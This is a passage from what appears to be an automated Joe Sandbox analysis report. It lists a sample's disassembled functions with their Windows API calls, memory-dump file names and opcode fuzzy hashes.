                                                                                  Function 6A6DFC70 Relevance: 9.1, APIs: 6, Instructions: 64processCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • _memset.LIBCMT ref: 6A6DFC97
                                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,?), ref: 6A6DFCA2
                                                                                  • Process32First.KERNEL32 ref: 6A6DFCBC
                                                                                  • Process32Next.KERNEL32(00000000,00000002), ref: 6A6DFCD1
                                                                                  • CloseHandle.KERNEL32(00000000,00000000,00000002), ref: 6A6DFCDB
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 6A6DFD00
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseHandleProcess32$CreateFirstNextSnapshotToolhelp32_memset
                                                                                  • String ID:
                                                                                  • API String ID: 4012237829-0
                                                                                  • Opcode ID: 3f524855b8907d5c805de61f7ab25981f4ed044805a7462cfb324a392bda3f9f
                                                                                  • Instruction ID: 20befa5e8b5d2ec5ae81441b9cf9a12db0feb5da9b3e033973c9c69fd98ca2dc
                                                                                  • Opcode Fuzzy Hash: 3f524855b8907d5c805de61f7ab25981f4ed044805a7462cfb324a392bda3f9f
                                                                                  • Instruction Fuzzy Hash: A61106716052805BD710EB39DC4AEEF77E8AFCA318F45082DE959C2180EF34A909C6E2
                                                                                  Function 6A6E22C0 Relevance: 9.1, APIs: 6, Instructions: 64networkCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: Cleanup$Startup__strlwr_memsetgethostname
                                                                                  • String ID:
                                                                                  • API String ID: 1390831569-0
                                                                                  • Opcode ID: ec433498f047e39757bb06c6f8b651332ca7c0cded06797911033e41cd0cc908
                                                                                  • Instruction ID: d80051221cae308cf5c2c83f38ad13c3089b6128a03fb16c37fddf9f5d4d63c4
                                                                                  • Opcode Fuzzy Hash: ec433498f047e39757bb06c6f8b651332ca7c0cded06797911033e41cd0cc908
                                                                                  • Instruction Fuzzy Hash: CD11E9706082419BDB649B74C85EBEF3BEA7F87308F44051DE589C61C1EF7065088A93
                                                                                  Function 0BEB6040 Relevance: 9.1, APIs: 6, Instructions: 55windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • CreateCompatibleDC.GDI32(00000000), ref: 0BEB6059
                                                                                  • SelectObject.GDI32(00000000), ref: 0BEB6062
                                                                                  • GetDIBColorTable.GDI32(00000000,00000000,00000100,?,00000000,?,00000000), ref: 0BEB6076
                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 0BEB6082
                                                                                  • DeleteDC.GDI32(00000000), ref: 0BEB6088
                                                                                  • CreatePalette.GDI32 ref: 0BEB60CE
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4576454799.000000000BE91000.00000020.00000001.01000000.0000000E.sdmp, Offset: 0BE90000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4576422339.000000000BE90000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BEF8000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BF01000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577624342.000000000BF04000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577655409.000000000BF05000.00000020.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579334515.000000000BFB3000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579380286.000000000BFB5000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579411305.000000000BFB6000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579444791.000000000BFB7000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579479117.000000000BFB8000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4580098133.000000000BFF6000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4580129775.000000000BFF7000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4581874737.000000000C0A1000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4581920696.000000000C0A3000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4582006869.000000000C0A9000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4582066863.000000000C0AC000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_be90000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateObjectSelect$ColorCompatibleDeletePaletteTable
                                                                                  • String ID:
                                                                                  • API String ID: 2515223848-0
                                                                                  • Opcode ID: f27efffbe91abd098c644515ed724fe23619b0869672f49119dbc89425f969c9
                                                                                  • Instruction ID: a0dbfdf345f5f54376d38ebbbf34009810d6f8f15c4dc8133ecf6c04d96b2b4d
                                                                                  • Opcode Fuzzy Hash: f27efffbe91abd098c644515ed724fe23619b0869672f49119dbc89425f969c9
                                                                                  • Instruction Fuzzy Hash: AC01B5716143106AEB20A73A9C43EAFB2F89FC0654F04E919B59997280EB74CC4C83A6
                                                                                  Function 6A70DD93 Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __CreateFrameInfo.LIBCMT ref: 6A70DDBB
                                                                                    • Part of subcall function 6A7016CF: __getptd.LIBCMT ref: 6A7016DD
                                                                                    • Part of subcall function 6A7016CF: __getptd.LIBCMT ref: 6A7016EB
                                                                                  • __getptd.LIBCMT ref: 6A70DDC5
                                                                                    • Part of subcall function 6A705883: __getptd_noexit.LIBCMT ref: 6A705886
                                                                                    • Part of subcall function 6A705883: __amsg_exit.LIBCMT ref: 6A705893
                                                                                  • __getptd.LIBCMT ref: 6A70DDD3
                                                                                  • __getptd.LIBCMT ref: 6A70DDE1
                                                                                  • __getptd.LIBCMT ref: 6A70DDEC
                                                                                  • _CallCatchBlock2.LIBCMT ref: 6A70DE12
                                                                                    • Part of subcall function 6A701774: __CallSettingFrame@12.LIBCMT ref: 6A7017C0
                                                                                    • Part of subcall function 6A70DEB9: __getptd.LIBCMT ref: 6A70DEC8
                                                                                    • Part of subcall function 6A70DEB9: __getptd.LIBCMT ref: 6A70DED6
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                                                                                  • String ID:
                                                                                  • API String ID: 1602911419-0
                                                                                  • Opcode ID: cfdfc672bf1df67f84d9c5ba2c089e1704c39ad13658e31cdcb6b867bde108d8
                                                                                  • Instruction ID: 1a43dea8face8049eeb082006b6f60c2c7cbbf4f4b1aca58a014b32cbfa1b8df
                                                                                  • Opcode Fuzzy Hash: cfdfc672bf1df67f84d9c5ba2c089e1704c39ad13658e31cdcb6b867bde108d8
                                                                                  • Instruction Fuzzy Hash: DE11B7B1D00209DFDB00DFA4D948BAEBBF1FB08318F118569E914A7252DF789A199B94
                                                                                  Function 6A6F5965 Relevance: 9.0, APIs: 6, Instructions: 46COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • ClientToScreen.USER32(?,?), ref: 6A6F5976
                                                                                  • GetDlgCtrlID.USER32(00000000), ref: 6A6F598A
                                                                                  • GetWindowLongA.USER32(00000000,000000F0), ref: 6A6F599A
                                                                                  • GetWindowRect.USER32(00000000,?), ref: 6A6F59AC
                                                                                  • PtInRect.USER32(?,?,?), ref: 6A6F59BC
                                                                                  • GetWindow.USER32(?,00000005), ref: 6A6F59C9
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$Rect$ClientCtrlLongScreen
                                                                                  • String ID:
                                                                                  • API String ID: 1315500227-0
                                                                                  • Opcode ID: 9ac2dbcd8e969eb6448bedb4db9a0fe5853e3851f18005a3b13ff3bef9b029c1
                                                                                  • Instruction ID: 2fa7109e08401d495850d748cdd5e44119694bc2a5b895807fc8d5e9d9b066a1
                                                                                  • Opcode Fuzzy Hash: 9ac2dbcd8e969eb6448bedb4db9a0fe5853e3851f18005a3b13ff3bef9b029c1
                                                                                  • Instruction Fuzzy Hash: 11018F32140156BBDF125F56CC09EEE3BAEEF42761F048521FD20E2040DB30DD028A95
                                                                                  Function 0BEB5724 Relevance: 9.0, APIs: 6, Instructions: 43COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 0BEB4F00: CreateBrushIndirect.GDI32(?), ref: 0BEB4FAA
                                                                                  • UnrealizeObject.GDI32(00000000), ref: 0BEB5730
                                                                                  • SelectObject.GDI32(?,00000000), ref: 0BEB5742
                                                                                  • SetBkColor.GDI32(?,00000000), ref: 0BEB5765
                                                                                  • SetBkMode.GDI32(?,00000002), ref: 0BEB5770
                                                                                  • SetBkColor.GDI32(?,00000000), ref: 0BEB578B
                                                                                  • SetBkMode.GDI32(?,00000001), ref: 0BEB5796
                                                                                    • Part of subcall function 0BEB4240: GetSysColor.USER32(8B0BEB55), ref: 0BEB424A
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4576454799.000000000BE91000.00000020.00000001.01000000.0000000E.sdmp, Offset: 0BE90000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4576422339.000000000BE90000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BEF8000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BF01000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577624342.000000000BF04000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577655409.000000000BF05000.00000020.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579334515.000000000BFB3000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579380286.000000000BFB5000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579411305.000000000BFB6000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579444791.000000000BFB7000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579479117.000000000BFB8000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4580098133.000000000BFF6000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4580129775.000000000BFF7000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4581874737.000000000C0A1000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4581920696.000000000C0A3000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4582006869.000000000C0A9000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4582066863.000000000C0AC000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_be90000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: Color$ModeObject$BrushCreateIndirectSelectUnrealize
                                                                                  • String ID:
                                                                                  • API String ID: 3527656728-0
                                                                                  • Opcode ID: 98e90de359cb0ccb1b0dd77e225cb59e17153769991a3f86e28391e594e62632
                                                                                  • Instruction ID: 2894e91e0301060f036ca152bb4a2d77bacca118553fb8dbaac9d49f6148f056
                                                                                  • Opcode Fuzzy Hash: 98e90de359cb0ccb1b0dd77e225cb59e17153769991a3f86e28391e594e62632
                                                                                  • Instruction Fuzzy Hash: 61F062B5615105AFCF04FFB8F9C6E4B67A8AF043057446490BA08DF39BCA65EC189B39
                                                                                  Function 6A6EDB00 Relevance: 9.0, APIs: 6, Instructions: 40timefileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000003,00000000,00000000,00000000,?), ref: 6A6EDB17
                                                                                  • GetFileTime.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,6A6EDE9F), ref: 6A6EDB2F
                                                                                  • DosDateTimeToFileTime.KERNEL32(?,?,?), ref: 6A6EDB3F
                                                                                  • LocalFileTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,6A6EDE9F), ref: 6A6EDB4F
                                                                                  • FlushFileBuffers.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,6A6EDE9F), ref: 6A6EDB56
                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,6A6EDE9F), ref: 6A6EDB5D
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: File$Time$BuffersCloseCreateDateFlushHandleLocal
                                                                                  • String ID:
                                                                                  • API String ID: 674073760-0
                                                                                  • Opcode ID: d3ece7259aa38a9240b5f19c8e2ed2e4a784bda58380403316271bee2a718884
                                                                                  • Instruction ID: 84852835f373f1c170158f5cc222f70e2d5640dcfbdda832ea55f51b780cd48c
                                                                                  • Opcode Fuzzy Hash: d3ece7259aa38a9240b5f19c8e2ed2e4a784bda58380403316271bee2a718884
                                                                                  • Instruction Fuzzy Hash: E5F068361002017BD7159B55CC4AFEB7BFCEBCD710F08452DF245E6080D774990A8BA5
                                                                                  Function 6A6E7290 Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 249COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • _malloc.LIBCMT ref: 6A6E72DC
                                                                                    • Part of subcall function 6A6FDB7C: __FF_MSGBANNER.LIBCMT ref: 6A6FDB9F
                                                                                    • Part of subcall function 6A6FDB7C: __NMSG_WRITE.LIBCMT ref: 6A6FDBA6
                                                                                    • Part of subcall function 6A6FDB7C: HeapAlloc.KERNEL32(00000000,?,00000001,00000000,00000000,?,6A706F8E,?,00000001,?,?,6A705E77,00000018,6A726C18,0000000C,6A705F08), ref: 6A6FDBF3
                                                                                  • _memset.LIBCMT ref: 6A6E72EC
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: AllocHeap_malloc_memset
                                                                                  • String ID: $$:rj$$:rj
                                                                                  • API String ID: 411814730-816229996
                                                                                  • Opcode ID: aed0a8df690a128783ed87807dcfcfda4541d8fd6fbc18ac4a09e1d69746e2c2
                                                                                  • Instruction ID: 86dc3f1c38a5ac23f18d86ea5574ae31ad3e471571b4dd0c62e5ad6400f42291
                                                                                  • Opcode Fuzzy Hash: aed0a8df690a128783ed87807dcfcfda4541d8fd6fbc18ac4a09e1d69746e2c2
                                                                                  • Instruction Fuzzy Hash: A8917971209341DFD340DF68C494A5BFBE4FF89714F058A4DE9A997292DB30E909CBA2
                                                                                  Function 6A6FA6B5 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 244COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: _memset
                                                                                  • String ID: @$@$AfxFrameOrView90s$AfxMDIFrame90s
                                                                                  • API String ID: 2102423945-455206835
                                                                                  • Opcode ID: e8298e6407024731388fd4aca75106b513e6b8e0026d4358260a1fa803028d49
                                                                                  • Instruction ID: 16c029bbf6b9eabf06d038a810360d8f18a3184237b34f52ea6213f1bb8e5e34
                                                                                  • Opcode Fuzzy Hash: e8298e6407024731388fd4aca75106b513e6b8e0026d4358260a1fa803028d49
                                                                                  • Instruction Fuzzy Hash: E1913172D0020DAADB41CFE4C588BDEBBF9AF04344F128565ED18E6191EF78C646C794
                                                                                  Function 6A6D72F0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 99COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • _memset.LIBCMT ref: 6A6D731E
                                                                                    • Part of subcall function 6A6E0470: GetModuleHandleA.KERNEL32 ref: 6A6E052A
